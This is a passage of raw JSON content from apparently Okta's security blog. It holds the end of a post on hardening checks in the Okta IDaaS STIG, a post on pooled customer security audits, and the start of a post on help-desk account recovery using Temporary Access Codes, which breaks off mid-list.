\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/newsroom/articles/first-drift--now-gainsight--closing-the-gaps-in-saas-hygiene/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Gainsight\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" attacks. These checks are specific to Okta’s offerings, but the same approach should be used for other service offerings. We hope these checks will serve you as well as they have served Okta. At the end of the day, this is a ‘least privilege’ issue. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Five Additional Checks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta API tokens must be configured with Network Zones to restrict authorization from known networks. API tokens are almost always privileged and sensitive. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This check helps to verify that for all Okta-specific API tokens, an IP restriction is in place to help confirm that if a token is compromised, it cannot be used from an unapproved IP. Typically, a customer would configure this to be either VPN/SASE IP ranges, datacenter (cloud) ranges, or known office ranges. These should be configured to known and “owned” contiguous IP space. In the case of cloud, it should be a known contiguous IP range that is allocated only to your organization. Allowlisting the entire IP range of a public cloud service provider like AWS, Google or Azure would not be appropriate. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta API tokens must be created under dedicated user accounts.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This is an Okta-specific check to help confirm that API tokens (NHI) are under a dedicated account that is not tied to an administrator. This aims to reduce privileges for NHIs and check if they are appropriate for their use cases. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta Global Session policy must be configured to allow or deny IP based access in accordance with the Access Control policy for Okta.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This check helps confirm that a Global Policy is defined for your users. In many companies, workforce users should only request resources from approved VPNs or SASE services (i.e. not from the general internet). In the DoD use cases, this may be restricted to NIPRNet or other approved networks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta must be configured with Network Zones defined to block anonymized proxies according to organizational defined policy.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Anonymized proxies are often a source of malicious traffic. Blocking this from the outset can help reduce probes as well as attack vectors. As a commercial customer, you may want to allow anonymized proxies for maximum reach and compatibility, but consider blocking them for privileged use cases. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For each application integrated with Okta, network zones must be defined in its authentication policy.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This check helps to confirm that every application configured in an Okta organization takes IP restrictions into consideration. Does it really need to be accessible to any malicious actor on the internet? Customers should take a risk-based approach and work to verify that network restrictions are appropriate for the accessibility and use cases. The default is to allow internet access to the application; so, care should be taken to evaluate whether that is appropriate for the application.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Call to Action\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recommend customers assess their Okta organizations against the updated STIG. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta IDaaS STIG is available to download at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://public.cyber.mil/stigs/downloads/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://public.cyber.mil/stigs/downloads/\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", search for Okta. If you have feedback on the STIG, please contact \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"mailto:fedramp@okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"fedramp@okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Version 1.1 of the Okta Security Technical Implementation Guide (STIG) provides U.S. government agencies additional hardening recommendations related to network security and non-human identities.\n"},"updatedAt":"2026-02-03T14:00:10.572Z","secAuthor":[{"id":"96970804-8b58-5b39-9146-0928bc8a399b","bio":{"bio":"Rob Gil is a Sr. Director, Federal Architecture at Okta and is responsible for leading the Public Sector technology initiatives for FedRAMP, DoD Impact Levels, and StateRAMP. Prior to Okta, Rob worked on the JEDI project for the DoD Cloud Computing Program Office as well as leading the Cloud SecOps team at Elastic. Rob’s work at Elastic helped set the foundations for the Elastic SIEM as an initial core contributor to the Elastic Common Schema and first version of the Elastic SIEM. Before Elastic, Rob led operations and engineering teams at Salesforce and a variety of financial institutions. When not working, Rob enjoys the quiet life on his homestead and dabbling with tech.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg"},"name":"Rob Gil","jobTitle":"Sr. Director, Federal Architecture","slug":"/hackers/rob-gil","node_locale":"en"},{"id":"110196ee-f45a-5ada-b02c-40d591fa732c","bio":{"bio":"Naveed is a Senior Solutions Architect at Okta, focusing on the DoD and Federal customer base. He has worked in cybersecurity since leaving the US Navy in the late 1990s. Before coming to Okta, Naveed was a consultant for several DoD customers, and he continues to offer advice via active participation in the DoD community. He grew up in Stafford, Virginia, and upon returning from active duty, took up residence there once more. In his free time, he enjoys beer brewing, gaming, and the occasional date night with his wife.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg"},"name":"Naveed Mirza","jobTitle":"Senior Solutions Architect","slug":"/hackers/naveed-mirza","node_locale":"en"},{"id":"76ecc069-7d69-5aa8-a81d-cf72595f683e","bio":{"bio":"Brandon Iske is a Principal Solutions Architect focused on enabling Federal Government and strategic accounts at Okta. He is passionate about strengthening our nation’s cybersecurity and user experience through Identity-focused IT modernization and cyber best practices. Before joining Okta, Brandon worked for over a decade in government public service to deliver and secure joint Department of Defense enterprise capabilities in endpoint security, mobile management, identity and access management, and Zero Trust architecture at the Defense Information Systems Agency. He earned a Bachelor’s Degree in Computer Science from the University of Nebraska at Omaha. He is also a National Science Foundation CyberCorps Scholarship for Service Alumnus and an Okta Certified Professional.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg"},"name":"Brandon Iske","jobTitle":"Principal Solutions Architect","slug":"/hackers/brandon-iske","node_locale":"en"}]},{"slug":"/pooledauditretro","id":"e6f9f5c5-3779-5bfe-9ef2-a4626c14b4f4","title":"Okta Pooled Security Audits: a One-Year Retrospective ","date":"2026-01-12T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Customer audit is evolving beyond the traditional one-to-one audit model. When Okta's Customer Audit team first published \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sec.okta.com/articles/2025/06/paving-the-path-pooled-audits-with-okta-security/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Paving the Path: Pooled Audits with Okta Security\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" last year, we shared our vision for moving beyond the limitations of siloed assessments. Today, as successive SaaS supply chain attacks continue to ring alarm bells across the industry, that strategic vision is now a reality.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"This year-in-review retrospective demonstrates how our pooled audit methodology has become a powerful mechanism for collaborative peer discussion - raising the bar for supply chain security for both Okta and our customers. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"The Rationale: Designed to be Different \",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Traditional audit models create a heavy, linear burden: each customer audit request requires Okta's security team to provide a tailored evidence package in response. Our pooled audit program was designed to break the status quo. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We measure success based on the program's ability to minimize redundant effort for our internal teams, while offering customers something a traditional audit cannot: context and community. By shifting to this model, we deliver assurance faster, but also provide a forum for peer-to-peer exchange that turns a compliance checkbox into a strategic value-add . \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Quantifying Success: The Metrics Validating the 1:Many Shift\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Our results validate the success of the pooled audit program. We track several KPIs that demonstrate a consistent, positive shift in our compliance efficiency and translate to business impact for customers.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Most notably, participant feedback highlights the quality and effectiveness of the new model. In our post-audit survey, customers indicated:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"94% reported feeling supported in achieving their organizational compliance and assurance goals, and\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"98% reported a high level of confidence in Okta as a security partner.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Our KPIs demonstrate program efficiency across the following strategic priorities;\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Key Performance Indicator (KPI)\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Trend (1-Year Retrospective)\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Business Impact\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"}],\"nodeType\":\"table-row\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Individual Audit Request Burden\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"As more customers participate in the pooled audit program, Okta's security team has been able to assist additional customers with unique requirements. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Demonstrates the successful transition from a 1:1 service model to a scalable, sustainable 1:Many approach, freeing up the team to support new audits.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"}],\"nodeType\":\"table-row\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Pooled Audit Participation Rate\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Increase in the number of customers participating in a single pooled session.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Proves the scalability and value of the program, resulting in a higher number of customers supported.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"}],\"nodeType\":\"table-row\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Customer Audit Days Saved\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Significant reduction in total FTE-days required from Okta Security supporting 1:1 audits. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Cost avoidance, allowing the team to focus on other value-add work. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"}],\"nodeType\":\"table-row\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Time-to-Assurance (TTA)\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Consistent decrease in the average time required for a participating customer to receive full audit assurance.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Accelerated compliance: Enables customers to meet their regulatory deadlines faster.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"}],\"nodeType\":\"table-row\"}],\"nodeType\":\"table\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Supply Chain Assurance\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Beyond compliance, the validation of the pooled audit program is its role in educating customers about current threats, and Okta’s best practice guidance to defend identities. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Audit sessions deep-dive into the controls that close the gaps exploited in the recent compromises of \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/newsroom/articles/the-salesloft-incident--a-wake-up-call-for-saas-security-and-ips/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Salesloft\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" and\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/de-de/newsroom/articles/first-drift--now-gainsight--closing-the-gaps-in-saas-hygiene/\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Gainsight\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", specifically validating our adherence to the five pillars of SaaS hygiene: \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Strong authentication,\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Strong identity governance,\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Interactive session security,\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Non-interactive session security, and\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Strong auditability.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"ordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"By aligning these technical verifications against global regulatory expectations (e.g. for financial services: DORA, APRA or NYDFS), the program does more than prove compliance; it provides customers with high-assurance evidence that their critical identity vendor is built to withstand and recover from major supply chain disruptions.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Deep-Dive Assurance at Scale\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The strategic value of the pooled audit program extends beyond efficiency; it redefines the depth of assurance. We move beyond static document exchanges, and instead host multiple industry-specific customers for multi-day, hands-on sessions to collectively assess our controls against their regulatory expectations. We encourage peer challenge, and this peer review makes us stronger. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Our recent engagements with financial services customers prove out this model. These were detailed, collective assessments across nine critical domains key to operational resilience and security.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The result is genuine assurance in a peer setting, offering value exceeding a compliance checkmark. By delivering granular, domain-specific coverage for specific regulations, we reduce reliance on bespoke, time-consuming customer audits in favor of a better outcome. Okta’s pooled audit methodology is increasing the depth of scrutiny our controls receive. Good for customers, and good for Okta. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Conclusion: A Call for a New Industry Norm\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We have transitioned from \\\"paving\\\" to \\\"practice\\\". The pooled audit program is no longer just an efficiency initiative; it is the assurance mechanism that informs our customers’ supply chain security posture and offers Okta valuable customer insight in a peer-to-peer forum. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"However, this success shouldn't be unique to Okta. This is our call to action for the wider SaaS industry in making the Pooled Audit model the norm, and not the exception. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We invite Okta customers to be part of this evolution: reach out to your account team today to join our next pooled audit cohort for your industry.\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"By adopting this shared assurance approach, we can collectively reduce the compliance burden on customers, eliminate redundancy, and focus our resources on what truly matters — securing the ecosystem against evolving threats.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"Okta and its customers are benefitting from \"pooled\" security audits."},"updatedAt":"2026-01-12T23:56:33.135Z","secAuthor":[{"id":"0549c9bd-5615-52a0-8683-f6b734b931cc","bio":{"bio":"Tushar Badlani is the Global Customer Audit Manager within the Security Trust and Culture team at Okta. He leads Okta’s global customer audit program, ensuring consistent, risk-aligned assurance engagements across all regions. He brings extensive experience in customer assurance, compliance, and cross-functional collaboration, shaped by his consulting background at EY and work across industries and in professional services. Originally from India, he earned his master’s degree from Syracuse University and is now based in San Francisco. Outside of work, he enjoys hiking, backpacking, and travelling to explore new places and cultures; he’s now been to 27 countries and 45 US States.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/61duT68OiTwHjxJS8gPPuy/f02be27b559de0ada96a7902d219f067/Tushar_HeadShot.jpg"},"name":"Tushar Badlani","jobTitle":"Global Customer Audit Manager","slug":"/hacker/tushar-badlani","node_locale":"en"}]},{"slug":"/articles/2025/12/account-recovery-without-password-resets","id":"8135b418-47e7-59dd-a4ba-3b80ac22b5bc","title":"Account Recovery, without Password Resets","date":"2025-12-10T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the joys of passwordless authentication is the huge reduction in help desk tickets arising from users who have forgotten or otherwise can’t access their passwords.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Organizations that have embraced \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/fp/fp-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta FastPass\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" report lower costs of support after the initial hurdle of getting their users enrolled. They also report greater confidence in their security posture, knowing that access to sensitive resources requires a tight coupling of a user and their device.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Those organizations that continue to rely on passwords as a primary authenticator still have good options for securing sign-on events: they can lock down sign-ins using device trust and multifactor authentication, among other options. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In any case, strong \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/policies/about-policies.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"sign-in policies\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" shift the threat actor’s available options to the next weakest point in the user lifecycle: enrollment and account recovery. Threat actors continue to enjoy success when impersonating users in calls to IT helpdesks, requesting the service desk staff perform a password reset (typically followed by follow-up calls to reset other MFA factors).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These attacks are often successful in organizations with outsourced service desks. Outsourced IT service desk professionals are highly incentivized around how responsive they are to client needs. In doing so they are highly vulnerable to a skilled social engineer who impersonates a senior figure in a client organization. While it’s the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://arstechnica.com/security/2025/07/how-do-hackers-get-passwords-sometimes-they-just-ask/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"subject of some debate\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", it’s the client organization’s duty to set up outsourced service desk professionals with the guardrails they need to withstand social engineering attacks. Those guardrails need to include strong identity verification processes, which present challenges in a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/newsroom/articles/verifying-identity-remote-workforce/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"remote and extended workforce\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \\n\\nTo help solve this problem, Okta has partnered with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/idp-idv.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"multiple identity verification providers\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2025/06/building-confidence-in-support-comms-with-caller-verify-at-okta/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"specialists in recovery workflows\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to prove the identity of an inbound caller. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once a user’s identity is verified, the next question is how to provide support desk personnel with a safe way to recover access for the user. That’s where \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/authenticators/configure-temporary-access-code.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Temporary Access Codes (TACs)\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" come in very handy. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Constraining account recovery\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Even if you have sufficiently verified the identity of an inbound caller, there are residual risks associated with service desk professionals being asked to create and share temporary passwords. A temporary password can be shared or intercepted and abused prior to use and rotation by the legitimate account holder.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Ideally, any use of temporary credentials is constrained to an expected context. A TAC, unlike a temporary password, is a time-bound secret that is classed in Okta as an authenticator, which means it can be subject to authentication policies. Administrators can decide, for example, which users are able to be issued a TAC, how long the TAC is valid for use, and from what location and device a TAC can be used. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"TACs bring an important account recovery option to passwordless environments, where a misplaced security key or other possession factor may temporarily prevent a user from accessing their resources. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But the utility of a TAC doesn’t end there. Any Okta workforce customer now has the option to disable the issuing of temporary passwords or resetting of passwords and MFA factors from front-line helpdesk roles. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I’ve previously \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/09/go-secure-default-custom-admin-roles-it-support-staff/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"recommended the use of custom admin roles\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to create helpdesk roles that constrain the ability of service desk professionals to reset the factors of privileged users like administrators. Now there’s an opportunity to go one step further and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/create-custom-admin-roles-for-user-account-recovery-processes\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"create custom admin roles that can’t reset passwords or factors\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The custom helpdesk role would need, at minimum:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The ability to read user information (“View Users and their Details”)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The ability to add a user to a specific group of users that are eligible for assigning Temporary Access Codes (“Edit user’s group membership,” “View 